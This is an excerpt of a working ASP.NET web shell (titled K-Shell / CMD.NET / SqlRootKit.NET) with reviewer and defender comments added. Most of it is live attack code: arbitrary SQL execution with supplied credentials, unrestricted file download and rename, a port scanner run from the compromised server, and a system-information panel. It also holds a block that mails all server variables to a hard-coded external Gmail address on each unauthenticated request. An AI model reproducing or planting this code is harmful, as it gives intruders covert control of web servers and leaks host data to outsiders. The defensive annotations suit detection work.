  427.             resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  428.             SqlCMD.Text=""
  429.          End if
  430.         adoConn.Close
  431.      End if
  432.  End Sub
  433. Sub RunSQLQUERY(Src As Object, E As EventArgs)
       ' Event handler that opens an ADODB connection through the SQLOLEDB provider
       ' with the form-supplied host, login and password (txtHost, txtSqlName,
       ' txtSqlPass) and executes txtSqlcmd.Text verbatim as the statement.
       ' Only the first column of each returned row is collected; spaces, "<" and
       ' ">" are replaced with HTML entities before display in lblresultSQL. The
       ' echoed statement text is not encoded. Does nothing when txtSqlName is empty.
       ' Defender note: the connection originates from the web server, so database
       ' logins from that host using accounts the application does not normally
       ' use are the signal to look for in SQL Server audit logs.
  434.     Dim adoConn,strQuery,recResult,strResult
  435.     if txtSqlName.Text<>"" then
  436.         adoConn=Server.CreateObject("ADODB.Connection")
  437.         adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text)
  438.         If txtSqlcmd.Text<>"" Then
  439.             strQuery = txtSqlcmd.Text
  440.             recResult = adoConn.Execute(strQuery)
  441.             If NOT recResult.EOF Then
  442.                 Do While NOT recResult.EOF
  443.                     strResult = strResult & chr(13) & recResult(0).value
  444.                     recResult.MoveNext
  445.                 Loop
  446.             End if
  447.             recResult = Nothing
  448.             strResult = Replace(strResult," ","&nbsp;")
  449.             strResult = Replace(strResult,"<","&lt;")
  450.             strResult = Replace(strResult,">","&gt;")
  451.             lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  452.             txtSqlCMD.Text=""
  453.          End if
  454.         adoConn.Close
  455.      End if
  456.  End Sub
  457.  
  458. Function GetStartedTime(ms)
       ' Converts a millisecond count to hours (ms / 3,600,000) and returns it as
       ' an integer via cint. The source of ms is outside this view.
  459.     GetStartedTime=cint(ms/(1000*60*60))
  460. End function
  461. Function getIP()
       ' Returns the caller's address as a trimmed string of at most 30 characters.
       ' Uses REMOTE_ADDR when the X-Forwarded-For header is empty or contains
       ' "unknown"; otherwise uses the header, cut at its first "," or ";" when
       ' one is present.
       ' Note: X-Forwarded-For is a request header, so whenever it is present the
       ' returned value is whatever the client or an intermediary sent.
  462.     Dim strIPAddr as string
  463.     If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
  464.         strIPAddr = Request.ServerVariables("REMOTE_ADDR")
  465.     ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
  466.         strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
  467.     ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
  468.         strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
  469.     Else
  470.         strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
  471.     End If
  472.     getIP = Trim(Mid(strIPAddr, 1, 30))
  473. End Function
  474. Function Getparentdir(nowdir)
       ' Returns the parent portion of a backslash-separated path, including its
       ' trailing backslash. Paths longer than four characters first lose their
       ' last character (presumably a trailing "\" - the code does not check).
       ' The loop then walks every "\" so that k ends one past the last separator.
       ' When the path contains no backslash (k = 2) the path is returned unchanged.
       ' Example traced from the code: "c:\foo\bar\" -> "c:\foo\".
  475.     dim temp,k as integer
  476.     temp=1
  477.     k=0
  478.     if len(nowdir)>4 then
  479.         nowdir=left(nowdir,len(nowdir)-1)
  480.     end if
  481.     do while temp<>0
               ' k remembers the search start used for this pass (last "\" + 2 once
               ' at least one separator has been found).
  482.         k=temp+1
  483.         temp=instr(temp,nowdir,"\")
  484.         if temp =0 then
  485.             exit do
  486.         end if
  487.         temp = temp+1
  488.     loop
  489.     if k<>2 then
  490.         getparentdir=mid(nowdir,1,k-2)
  491.     else
  492.         getparentdir=nowdir
  493.     end if
  494. End function
  495. Function Rename()
       ' Renames the file named by the query-string "src" to the form field "name"
       ' inside the same parent directory, implemented as copy-then-delete.
       ' Returns 0 without changing anything when a file with the new name already
       ' exists, otherwise 1. Sets the page-level variable url as a side effect.
       ' Only File.Exists / File.Copy are used, so directory sources are
       ' presumably not handled by this routine.
  496.     url=request.QueryString("src")
  497.     if file.exists(Getparentdir(url) & request.Form("name")) then
  498.         rename=0  
  499.     else
  500.         file.copy(url,Getparentdir(url) & request.Form("name"))
  501.         del(url)
  502.         rename=1
  503.     end if
  504. End Function
  505. Function GetSize(temp)
       ' Formats a byte count as a display string in bytes, KB, MB or GB.
       ' Each step uses integer division by 1024, so values are truncated rather
       ' than rounded (for example 1535 bytes is shown as "1 KB").
  506.     if temp < 1024 then
  507.         GetSize=temp & " bytes"
  508.     else
  509.         if temp\1024 < 1024 then
  510.             GetSize=temp\1024 & " KB"
  511.         else
  512.             if temp\1024\1024 < 1024 then
  513.                 GetSize=temp\1024\1024 & " MB"
  514.             else
  515.                 GetSize=temp\1024\1024\1024 & " GB"
  516.             end if
  517.         end if
  518.     end if
  519. End Function
  520. Sub downTheFile(thePath)
       ' Streams the file at thePath to the client as a download: loads it in
       ' binary mode (type=1) through an ADODB.Stream COM object, sets
       ' Content-Disposition (attachment, URL-encoded file name), Content-Length
       ' and an application/octet-stream content type, writes the bytes, then
       ' ends the response.
       ' No restriction on thePath is visible here; any file the page's identity
       ' can read can be returned.
       ' Defender note: responses from an .aspx URL carrying
       ' application/octet-stream attachments with large bodies are the network
       ' trace of this routine.
  521.         dim stream
  522.         stream=server.createObject("adodb.stream")
  523.         stream.open
  524.         stream.type=1
  525.         stream.loadFromFile(thePath)
  526.         response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  527.         response.addHeader("Content-Length",stream.Size)
  528.         response.charset="UTF-8"
  529.         response.contentType="application/octet-stream"
  530.         response.binaryWrite(stream.read)
  531.         response.flush
  532.         stream.close
  533.         stream=nothing
  534.         response.End()
  535. End Sub
  536. 'H T M L  S N I P P E T S
  537. public sub Newline
  538.         response.write("<BR>")
  539.     end sub
  540.    
  541.     public sub TextNewline
  542.         response.write(vbnewline)
  543.     end sub
  544.  
  545.     public sub rw(text_to_print)      ' Response.write
           ' Thin wrapper over response.write used by the HTML helper routines.
           ' The text is written as-is, with no HTML encoding.
  546.         response.write(text_to_print)
  547.     end sub
  548.  
  549.     public sub rw_b(text_to_print)
  550.         rw("<b>"+text_to_print+"</b>")
  551.     end sub
  552.  
  553.     public sub hr()
  554.         rw("<hr>")
  555.     end sub
  556.  
  557.     public sub ul()
  558.         rw("<ul>")
  559.     end sub
  560.  
  561.     public sub _ul()
  562.         rw("</ul>")
  563.     end sub
  564.  
  565.     public sub table(border_size,width,height)
           ' Writes an opening <table> tag with the given border, width and height
           ' attribute values (each converted with cstr). The matching close tag
           ' is written by _table.
  566.         rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
  567.     end sub
  568.  
  569.     public sub _table()
  570.         rw("</table>")
  571.     end sub
  572.  
  573.     public sub tr()
  574.         rw("<tr>")
  575.     end sub
  576.  
  577.     public sub _tr()
  578.         rw("</tr>")
  579.     end sub
  580.  
  581.     public sub td()
  582.         rw("<td>")
  583.     end sub
  584.  
  585.     public sub _td()
  586.         rw("</td>")
  587.     end sub
  588.  
  589.     public sub td_span(align,name,contents)
  590.         rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
  591.     end sub
  592.  
  593.     Public sub td_link(align,title,link,target)
  594.         rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
  595.     end sub
  596.  
  597.     Public sub link(title,link,target)
  598.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  599.     end sub
  600.  
  601.     Public sub link_hr(title,link,target)
  602.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  603.         hr
  604.     end sub
  605.  
  606.     Public sub link_newline(title,link,target)
  607.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  608.         newline
  609.     end sub
  610.    
  611.     public sub empty_Cell(ColSpan)
  612.         rw("<td colspan='"+cstr(colspan)+"'></td>")
  613.     end sub
  614.  
  615.     public sub empty_row(ColSpan)
  616.         rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
  617.     end sub
  618.  
  619.         Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
               ' Writes one table row whose cells are the comma-separated entries of
               ' rowItems, each bold and rendered with the given background colour,
               ' font colour and alignment. The WMI listing functions use it for
               ' their header rows.
               ' Cell text and attribute values are written without HTML encoding.
               ' NOTE(review): the cell markup ends with a second "<b>" where "</b>"
               ' was presumably intended.
  620.             dim rowItem
  621.  
  622.             rowItems = split(rowItems,",")
  623.             response.write("<tr bgcolor="+bgcolor+">")
  624.             for each rowItem in RowItems
  625.                 response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
  626.             next
  627.             response.write("</tr>")
  628.  
  629.         end sub
  630.  
  631.         Public sub TR_TD(cellContents)
  632.             response.write("<td>")
  633.             response.write(cellContents)
  634.             response.write("</td>")
  635.         end sub
  636.    
  637.  
  638.         Public sub Surround_by_TD(cellContents)
               ' Writes cellContents wrapped in <td>...</td>. The contents are not
               ' HTML-encoded. Identical in effect to TR_TD.
  639.             response.write("<td>")
  640.             response.write(cellContents)
  641.             response.write("</td>")
  642.         end sub
  643.  
  644.         Public sub Surround_by_TD_and_Bold(cellContents)
               ' Writes cellContents wrapped in <td><b>...</b></td>. The contents are
               ' not HTML-encoded.
  645.             response.write("<td><b>")
  646.             response.write(cellContents)
  647.             response.write("</b></td>")
  648.         end sub
  649.  
  650.         Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
  651.             response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
  652.             response.write(cellContents)
  653.             response.write("</b></font></td>")
  654.         end sub
  655.     Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
  656.         response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
  657.         response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
  658.         response.write("    <tr heigth=20>")
  659.         response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
  660.         response.write("    </tr>")
  661.         response.write("    <tr>")
  662.         response.write("      <td>"+main_Cell_contents+"</td>")
  663.         response.write("    </tr>")
  664.         response.write("  </table>")
  665.         response.write("</div>")
  666.     end sub
  667.  
  668.     Public sub Create_Div_open(top,left,width,height,z_index)
  669.         response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
  670.     end sub
  671.  
  672.  
  673.     Public sub Create_Div_close()
  674.         response.write("</div>")
  675.     end sub
  676.  
  677.     public sub Create_Iframe(left, top, width, height, name,src)
  678.         rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
  679.         rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
  680.             rw("</span>")
  681.     end sub
  682.  
  683.     public sub Create_Iframe_relative(width, height, name,src)
               ' Same <iframe> markup as Create_Iframe but without the positioning <span>, so the
               ' frame is laid out in normal flow. name and src are inserted unencoded.
  684.         rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
  685.     end sub
  686.  
  687.     public sub return_100_percent_table()
               ' Despite the name this is a Sub and returns nothing: it writes a fixed
               ' 100% x 100% table whose only cell holds the placeholder text "sdf".
  688.         rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
  689.     end sub
  690.  
  691.     public sub font_size(size)
               ' Writes an opening <font size=...> tag; end_font writes the closing tag.
               ' size is concatenated unquoted and unencoded.
  692.         rw("<font size="+size+">")
  693.     end sub
  694.  
  695.     public sub end_font()
               ' Writes the closing </font> tag that pairs with font_size.
  696.         rw("</font>")
  697.     end sub
  698.  
  699.     public sub red(contents)
               ' Writes contents wrapped in a red <font> element; contents is not HTML-encoded.
  700.         rw("<font color=red>"+contents+"</font>")
  701.     end sub
  702.  
  703.     public sub yellow(contents)
               ' Writes contents wrapped in a <font> element coloured #FF8800;
               ' contents is not HTML-encoded.
  704.         rw("<font color='#FF8800'>"+contents+"</font>")
  705.     end sub
  706.  
  707.     public sub green(contents)
               ' Writes contents wrapped in a green <font> element; contents is not HTML-encoded.
  708.         rw("<font color=green>"+contents+"</font>")
  709.     end sub
  710.     public sub print_var(var_name, var_value,var_description)
               ' Writes one "name : value" line with the name in bold; when var_description is
               ' non-empty it is appended in italics inside parentheses. The value and the
               ' description are written without HTML encoding.
               ' newline is defined elsewhere in this file (presumably writes a line break - confirm).
  711.         if var_description<> "" Then
  712.             rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
  713.         else
  714.             rw(b_(var_name)+" : " + var_value)
  715.         end if
  716.         newline
  717.     end sub
  718.  
  719. ' Functions
  720.  
  721.     public function br_()
               ' Returns the literal "<br>" tag as a string; nothing is written to the response.
  722.         br_ = "<br>"
  723.     end function
  724.  
  725.     public function b_(contents)
               ' Returns contents wrapped in <b>...</b>. contents is concatenated as-is (no encoding).
  726.         b_ = "<b>"+ contents + "</b>"
  727.     end function
  728.  
  729.     public function i_(contents)
               ' Returns contents wrapped in <i>...</i>. contents is concatenated as-is (no encoding).
  730.         i_ = "<i>"+ contents + "</i>"
  731.     end function
  732.  
  733.     public function li_(contents)
               ' Returns contents wrapped in <li>...</li>. contents is concatenated as-is (no encoding).
  734.         li_ = "<li>"+ contents + "</li>"
  735.     end function
  736.  
  737.     public function h1_(contents)
               ' Returns contents wrapped in <h1>...</h1>. contents is concatenated as-is (no encoding).
  738.         h1_ = "<h1>"+ contents + "</h1>"
  739.     end function
  740.  
  741.     public function h2_(contents)
               ' Returns contents wrapped in <h2>...</h2>. contents is concatenated as-is (no encoding).
  742.         h2_ = "<h2>"+ contents + "</h2>"
  743.     end function
  744.  
  745.     public function h3_(contents)
               ' Returns contents wrapped in <h3>...</h3>. contents is concatenated as-is (no encoding).
  746.         h3_ = "<h3>"+ contents + "</h3>"
  747.     end function
  748.  
  749.     public function big_(contents)
               ' Returns contents wrapped in <big>...</big>. contents is concatenated as-is (no encoding).
  750.         big_ = "<big>"+ contents + "</big>"
  751.     end function
  752.  
  753.     public function center_(contents)
               ' Returns contents wrapped in <center>...</center>. Unlike the sibling helpers this
               ' one passes contents through cstr() first; it is still not HTML-encoded.
  754.         center_ = "<center>"+ cstr(contents) + "</center>"
  755.     end function
  756.  
  757.  
  758.     public function td_force_width_(width)
               ' Returns a "<br>" followed by a zero-height, borderless <img> with an empty src
               ' whose width attribute is set to width (converted with cstr).
  759.         td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
  760.     end function
  761.  
  762.  
  763.     public function red_(contents)
               ' String-returning counterpart of the red sub: same markup, but returned instead
               ' of written. contents is not HTML-encoded.
  764.         red_ = "<font color=red>"+contents+"</font>"
  765.     end function
  766.  
  767.     public function yellow_(contents)
               ' String-returning counterpart of the yellow sub (colour #FF8800).
               ' contents is not HTML-encoded.
  768.         yellow_ = "<font color='#FF8800'>"+contents+"</font>"
  769.     end function
  770.  
  771.     public function green_(contents)
               ' String-returning counterpart of the green sub. contents is not HTML-encoded.
  772.         green_ = "<font color=green>"+contents+"</font>"
  773.     end function
  774.  
  775.     Public function link_(title,link,target)
               ' Returns an <a> element with href=link, target=target and title as the link text.
               ' All three values are placed into the markup unencoded; link and target sit
               ' inside single-quoted attributes.
  776.         link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
  777.     end function
  778. 'End HTML SNIPPETS 
  779.  
  780. 'Begin Scanner
  781. Public Class Scanner
       ' TCP connect scanner used by the page's "scan" action. For every (address, port) pair
       ' it attempts a full TCP connection and appends an "Open" or "Close" line to a ListBox.
       ' Review note (defensive): the addresses and ports are taken from the page's text boxes
       ' (see btnScan_Click), so the host serving this page makes outbound connection attempts
       ' to whatever targets the operator types in. Egress filtering and connection logging for
       ' the account that runs the web application are the controls that expose or block this.
       '
       ' Ips / ports : lists of strings iterated by run().
       ' succMsg     : never read or written inside this class.
       ' ret         : ListBox that receives one result line per address/port pair.
       ' errMsg      : last SocketException text captured by the outer Catch in run().
       ' Timeout     : declared as 3000 but not applied anywhere in this class; Connect is
       '               called without a timeout.
  782. Public Ips As New ArrayList()
  783. Public ports As New ArrayList()
  784. Public succMsg As New StringBuilder()
  785. Public ret As ListBox
  786. Public errMsg As String = ""
  787. Public Timeout As Integer = 3000
       ' Runs run() on a new thread and returns immediately. The visible caller
       ' (btnScan_Click) calls run() directly instead of using this method.
  788. Public Sub start()
  789. Dim thread As New Thread(New ThreadStart(AddressOf Me.run))
  790. thread.Start()
  791. thread = Nothing
  792. End Sub
  793.  
       ' Clears the result list, then tries every port on every address in turn.
  794. Public Sub run()
  795. ret.Items.Clear()
  796. For Each ip As String In Ips
  797. For Each port As String In ports
  798. 'ret.Items.Add(ip + ":" + port);
       ' scanres is assigned but never used.
  799. Dim scanres As String = ""
  800. Try
  801. Dim tcpClient As New TcpClient()
  802. Try
       ' Int32.Parse throws FormatException on a non-numeric port; only SocketException is
       ' caught here, so a malformed port aborts the whole scan.
  803.             tcpClient.Connect(ip, Int32.Parse(port))
  804.             tcpClient.Close()
  805.             ret.Items.Add(ip + " : " + port + " ................................. Open")
  806.       Catch e As SocketException
       ' Any socket error (refused, unreachable, timed out) is reported as "Close".
  807.             ret.Items.Add(ip + " : " + port + " ................................. Close")
  808. End Try
       ' Second Close() call; the success path above has already closed the client once.
  809. tcpClient.Close()
  810. Catch exp As SocketException
  811. errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message
  812. End Try
  813. Next
  814. Next
  815. End Sub
  816. End Class
  817.  
  818. Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList
       ' Expands a dotted start/end address pair into an ArrayList of address strings.
       ' Returns Nothing (after writing an error line to the response) when the computed
       ' count is negative, i.e. the end address lies before the start address.
       ' Nothing checks that either input has four numeric parts: Int32.Parse or the index
       ' access below throws on malformed input.
  819. Dim IpList As New ArrayList()
       ' The two pre-sized arrays are replaced by the Split results two lines further down.
  820. Dim IpParts1 As String() = New String(3) {}
  821. Dim IpParts2 As String() = New String(3) {}
  822. IpParts1 = StartIp.Split("."C)
  823. IpParts2 = EndIP.Split("."C)
       ' Number of addresses to emit, counting 254 values per octet step to match the
       ' rollover logic in the loop (255 wraps to 1).
  824. Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1
  825. If nTime < 0 Then
  826. Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")
  827. Return Nothing
  828. End If
  829. For n As Integer = 0 To nTime - 1
       ' Emit the current address, then advance the last octet by one.
  830. IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))
  831. Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1
  832. IpParts1(3) = tmp.ToString()
       ' Carry: an octet that reaches "255" is reset to "1" and the next-higher octet is
       ' incremented, so values 0 and 255 are never produced after a rollover.
  833. If IpParts1(3).Equals("255") Then
  834. tmp = Int32.Parse(IpParts1(2)) + 1
  835. IpParts1(2) = tmp.ToString()
  836. IpParts1(3) = "1"
  837. End If
  838. If IpParts1(2).Equals("255") Then
  839. tmp = Int32.Parse(IpParts1(1)) + 1
  840. IpParts1(1) = tmp.ToString()
  841. IpParts1(2) = "1"
  842. End If
  843. If IpParts1(1).Equals("255") Then
  844. tmp = Int32.Parse(IpParts1(0)) + 1
  845. IpParts1(0) = tmp.ToString()
  846. IpParts1(1) = "1"
  847.  
  848. End If
  849. Next
  850. Return IpList
  851. End Function
  852.  
  853.  
  854. Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)
       ' Click handler for the "Scan" button: builds the address and port lists from the three
       ' text boxes and runs a Scanner over them, writing results into lstRet.
       ' The only validation is that all three boxes are non-empty; address and port syntax
       ' are not checked here.
  855. If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then
  856. Response.Write("IP OR Ports Error.Check")
  857. Return
  858. End If
  859. Dim StartIp As String = txtStartIP.Text
  860. Dim EndIp As String = txtEndIP.Text
       ' MakeIps returns Nothing for a reversed range; that result is passed on unchecked.
  861. Dim ips As ArrayList = MakeIps(StartIp, EndIp)
  862. Dim ScanPorts As New ArrayList()
       ' Ports stay as strings; Scanner.run converts them with Int32.Parse.
  863. Dim ports As String() = txtPorts.Text.Split(","C)
  864. For Each port As String In ports
  865. 'Response.Write(port);
  866. ScanPorts.Add(port)
  867. Next
  868. lstRet.Visible = True
  869. Label1.Visible = True
  870. Dim myscanner As New Scanner()
  871. myscanner.Ips = ips
  872. myscanner.ports = ScanPorts
  873. myscanner.ret = Me.lstRet
       ' run() is called directly, so the whole scan executes inside this request;
       ' Scanner.start() (background thread) is not used.
  874. myscanner.run()
  875. End Sub
  876.  
  877. Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)
       ' Click handler for the "Reset" button: empties the three scan input boxes and hides
       ' the result label and result list again.
  878. txtStartIP.Text = ""
  879. txtEndIP.Text = ""
  880. txtPorts.Text = ""
  881. Label1.Visible = False
  882. lstRet.Visible = False
  883. End Sub
  884. 'End Scanner
  885. </script>
  886. <%
       ' Page-level code that runs on every request, before the HTML below is sent.
       ' 1) File download: taken only when action=down AND the session flag "rooot" equals 1.
       '    downTheFile is defined elsewhere in this file and receives the raw "src" query
       '    value; response.End() then stops the rest of the page from rendering.
  887. if request.QueryString("action")="down" and session("rooot")=1 then
  888.         downTheFile(request.QueryString("src"))
  889.         response.End()
  890. end if
       ' 2) Map the "action" query value to a display title. This part runs whether or not
       '    the session flag is set.
       '    Review note (defensive): the action values and titles below are fixed strings, so
       '    they are usable as signatures when searching web-server logs (query strings) or
       '    scanning web roots for this file.
       '    TITLE is only assigned here; the <title> element further down is empty in this listing.
  891. Dim act as string = request.QueryString("action")
  892. if act="cmd" then
  893. TITLE="CMD.NET"
  894. elseif act="cmdw32" then
  895. TITLE="ASP.NET W32 Shell"
  896. elseif act="cmdwsh" then
  897. TITLE="ASP.NET WSH Shell"
  898. elseif act="sqlrootkit" then
  899. TITLE="SqlRootKit.NET"
  900. elseif act="clonetime" then
  901. TITLE="Clone Time"
  902. elseif act="information" then
  903. TITLE="Web Server Info"
  904. elseif act="goto" then
  905. TITLE="K-Shell 1.2"
  906. elseif act="pro1" then
  907. TITLE="List processes from server"
  908. elseif act="pro2" then
  909. TITLE="List processes from server"
  910. elseif act="user" then
  911. TITLE="List User Accounts"
  912. elseif act="applog" then
  913. TITLE="List Application Event Log Entries"
  914. elseif act="syslog" then
  915. TITLE="List System Event Log Entries"
  916. elseif act="auser" then
  917. TITLE="IIS List Anonymous' User details"
  918. elseif act="sqlman" then
  919. TITLE="MSSQL Management"
  920. elseif act="scan" then
  921. TITLE="Port Scanner"
  922. elseif act="iisspy" then
  923. TITLE="IIS Spy"
  924. elseif act="sqltool" then
  925. TITLE="SQL Tool"
  926. elseif act="regshell" then
  927. TITLE="Registry Shell"
  928. else
       ' Any other (or missing) action: fall back to the request's Host header.
  929. TITLE=request.ServerVariables("HTTP_HOST")
  930. end if
  931. %>
  932. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  933. <html>
  934. <style>
  935. body{background-color:#444;color:#e1e1e1;}
  936. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  937. table.info{ color:#fff;background-color:#222; }
  938. span,h1,a{ color: #df5 !important; }
  939. span{ font-weight: bolder; }
  940. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  941. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  942. a{ text-decoration:none; }
  943. a:hover{ text-decoration:underline; }
  944. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  945. .bigarea{ width:100%;height:300px; }
  946. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
  947. form{ margin:0px; }
  948. .toolsInp{ width: 300px }
  949. .main th{text-align:left;background-color:#5e5e5e;}
  950. .main tr:hover{background-color:#5e5e5e}
  951. .l1{background-color:#444}
  952. .l2{background-color:#333}
  953. pre{font-family:Courier,Monospace;}
  954. </style>
  955. <head>
  956. <meta http-equiv="Content-Type" content="text/html">
  957. <title></title>
  958. </head>
  959. <body>
  960. <hr>
  961. <%
  962. Dim error_x as Exception
  963. Try
  964. if session("rooot")<>1 then
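  965. 'Test: send anonymous mail (comment this block out if you do not want to test it). Review note: this block runs on every request that lacks the session flag and mails the full set of server variables to a hard-coded external address through the local SMTP server; the empty Catch silently ignores any failure.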
  966.     dim info As String
  967.     Try
  968.     info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
  969.     System.Web.Mail.SmtpMail.SmtpServer = "localhost"
  970.     System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
  971.     Catch
  972.     End Try
  973. %>
  974. <center>
  975. <form runat="server">
  976.   Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
  977.   <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
  978. </form>
  979. </center>
  980. <%
  981. else
  982.     dim temp as string
  983.     temp=request.QueryString("action")
  984.     if temp="" then temp="goto"
  985.     select case temp
  986.     case "goto"
  987.         if request.QueryString("src")<>"" then
  988.             url=request.QueryString("src")
  989.         else
  990.             url=server.MapPath(".") & "\"
  991.         end if
  992.     call existdir(url)
  993.     dim xdir as directoryinfo
  994.     dim mydir as new DirectoryInfo(url)
  995.     dim guru as string
  996.     dim xfile as fileinfo
  997.    
  998.     dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - "
  999.     dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> <b>"+ Environment.UserName +"</b><br>"
  1000.     dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + Environment.OSVersion.ToString() + "</b>"
  1001.     dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>"
  1002.     dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>"
  1003.     dim HARDWARE_INFO As string = ""
  1004.     Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
  1005.     Dim de As DictionaryEntry
  1006.     For Each de In  environmentVariables
  1007.     if de.Key = "NUMBER_OF_PROCESSORS" then
  1008.     HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - "
  1009.     end if
  1010.     if de.Key = "PROCESSOR_IDENTIFIER" then
  1011.     HARDWARE_INFO += de.Value + "</b><br>"
  1012.     end if
  1013.     Next
  1014.     Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO
  1015. %>
  1016. <table width="100%"  border="0" align="center">
  1017.   <tr>
  1018.     <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td>
  1019.   </tr>
  1020. </table>
  1021. <hr>
  1022.  
  1023. <table width="100%"  border="0" align="center">
  1024.   <tr>
  1025.     <td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  1026.   </tr>
  1027.   <tr>
  1028.     <td width="10%">Operate:</td>
  1029.     <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
  1030.       <%if session("cutboard")<>"" then%>
  1031.       <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> -
  1032.       <%else%>
  1033.     Paste -
  1034. <%end if%>
  1035. <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
  1036. </td>
  1037.   </tr>
  1038.   <tr>
  1039.     <td>
  1040.     Go to: </td>
  1041.     <td>
  1042. <%
  1043. dim i as integer
  1044. for i =0 to Directory.GetLogicalDrives().length-1
